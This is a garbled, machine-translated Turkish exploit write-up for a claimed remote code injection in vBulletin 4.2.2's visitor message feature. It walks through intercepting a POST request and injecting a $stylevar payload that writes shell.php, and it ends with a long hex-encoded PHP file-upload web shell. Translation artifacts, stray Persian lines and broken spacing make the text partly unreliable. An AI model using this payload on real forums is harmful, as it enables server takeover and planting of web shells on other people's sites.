GOOGLE TRANSLATE İLE TÜRKÇEYE ÇEVRİLMİŞ HALİ
Başlık Exploit: vBulletin 4.xx 'visitormessage.php' Uzaktan Kod Enjeksiyon Güvenlik Açığı
Bulan: Dariush Nasirpour (Net.Edit0r)
Satıcı Web Sitesi: vBulletin.com
Test: [vBulletin 4.2.2]
Uzaktan Kod Enjeksiyon :
1) Powered
http://www.victim.com/register.php örnekte Kayıt olmalı: [blackhat]
2) Kullanıcı profili örneğin gidin: [
تیم امنیتی هکران کلاه سیاه ایران - آموزش امنیت و راه های مقابله با هک
3) Canlı http başlığı ile ziyaretçi mesajı ve kayıt sonrası verilerde bir şey sonrası
[ örnek ]: message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7% D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomm ent=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=messag e&u=110&u2=&loggedinuser=110&parseurl=1&lastcommen t=1425022046&allow_ajax_qc=1&fromconverse=
"For-Test-Numune" şey 4- değişiklik mesajı => "ALEEEEEEEEX" [vBulletin Eğer bir zamanda aynı yorum göndermek izin vermeyin çünkü]
[Şimdi hackbar ile bu deftere:]
URL:
تیم امنیتی هکران کلاه سیاه ایران - آموزش امنیت و راه های مقابله با هک
[ Mesaj veriler ]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbut ton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8 %BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoke n=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=messag e&u=110&u2=&loggedinuser=110&parseurl=1&lastcommen t=1425022046&allow_ajax_qc=1&fromconverse=
[ Ve yönlendiren verileri :]
PoC: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u kabuk yükleyebilirsiniz] ")}}] "
5- Açık hackbar ve konik verilerle kurcalamak:
yönlendirme veri URL tarayıcı tarafından kodlanmış, sen sabotaj verilerle tekrar değiştirmek zorunda: ] kabuk yükleyebilirsiniz ")}}]" ve isteği gönderin.
- See more at:
vBulletin 4.2.2 Remote Code Injection
?a=$stylevar[${${file_put_contents("shell.php","\x3C\x68\x74\x6 D\x6C\x3E\xD\xA\x20\x20\x20\x20\x3C\x62\x6F\x64\x7 9\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6 6\x6F\x72\x6D\x20\x6D\x65\x74\x68\x6F\x64\x3D\x22\ x70\x6F\x73\x74\x22\x20\x61\x63\x74\x69\x6F\x6E\x3 D\x22\x22\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x22\ x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x7 2\x6D\x2D\x64\x61\x74\x61\x22\x3E\xD\xA\x20\x20\x2 0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6C\x61\ x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x66\x69\x6C\x6 5\x22\x3E\x46\x69\x6C\x65\x6E\x61\x6D\x65\x3A\x3C\ x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x69\x6E\x70\x75\x7 4\x20\x74\x79\x70\x65\x3D\x22\x66\x69\x6C\x65\x22\ x20\x6E\x61\x6D\x65\x3D\x22\x66\x69\x6C\x65\x31\x2 2\x20\x69\x64\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\ x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\ x20\x20\x20\x3C\x62\x72\x3E\xD\xA\x20\x20\x20\x20\ x20\x20\x20\x20\x20\x20\x20\x20\x3C\x69\x6E\x70\x7 5\x74\x20\x74\x79\x70\x65\x3D\x22\x73\x75\x62\x6D\ x69\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x73\x75\x6 2\x6D\x69\x74\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\ x53\x75\x62\x6D\x69\x74\x22\x20\x2F\x3E\xD\xA\x20\ x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x66\x6F\x72\x6 D\x3E\xD\xA\x20\x20\x20\x20\x3C\x2F\x62\x6F\x64\x7 9\x3E\xD\xA\x3C\x2F\x68\x74\x6D\x6C\x3E\xD\xA\x3C\ x3F\x70\x68\x70\xD\xA\x69\x66\x28\x69\x73\x73\x65\ x74\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x73\x75\x6 2\x6D\x69\x74\x27\x5D\x29\x29\x20\x7B\xD\xA\x20\x2 0\x20\x20\x69\x66\x20\x28\x24\x5F\x46\x49\x4C\x45\ x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x6 5\x72\x72\x6F\x72\x22\x5D\x20\x3E\x20\x30\x29\x20\ x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\ x68\x6F\x20\x22\x45\x72\x72\x6F\x72\x3A\x20\x22\x2 0\x2E\x20\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\ x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x7 2\x22\x5D\x20\x2E\x20\x22\x3C\x62\x72\x20\x2F\x3E\ x22\x3B\xD\xA\x20\x20\x20\x20\x7D\x20\xD\xA\x20\x2 0\x20\x20\x65\x6C\x73\x65\x20\xD\xA\x20\x20\x20\x2 0\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x6 F\x76\x65\x5F\x75\x70\x6C\x6F\x61\x64\x65\x64\x5F\ x66\x69\x6C\x65\x28\x24\x5F\x46\x49\x4C\x45\x53\x5 B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x74\x6D\ x70\x5F\x6E\x61\x6D\x65\x22\x5D\x2C\x67\x65\x74\x6 3\x77\x64\x28\x29\x2E\x22\x5C\x5C\x22\x2E\x24\x5F\ x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x2 2\x5D\x5B\x22\x6E\x61\x6D\x65\x22\x5D\x29\x3B\xD\x A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\ x20\x22\x75\x70\x6C\x6F\x61\x64\x20\x69\x73\x20\x6 F\x6B\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\xD\xA\x7D\ xD\xA\x3F\x3E")}}]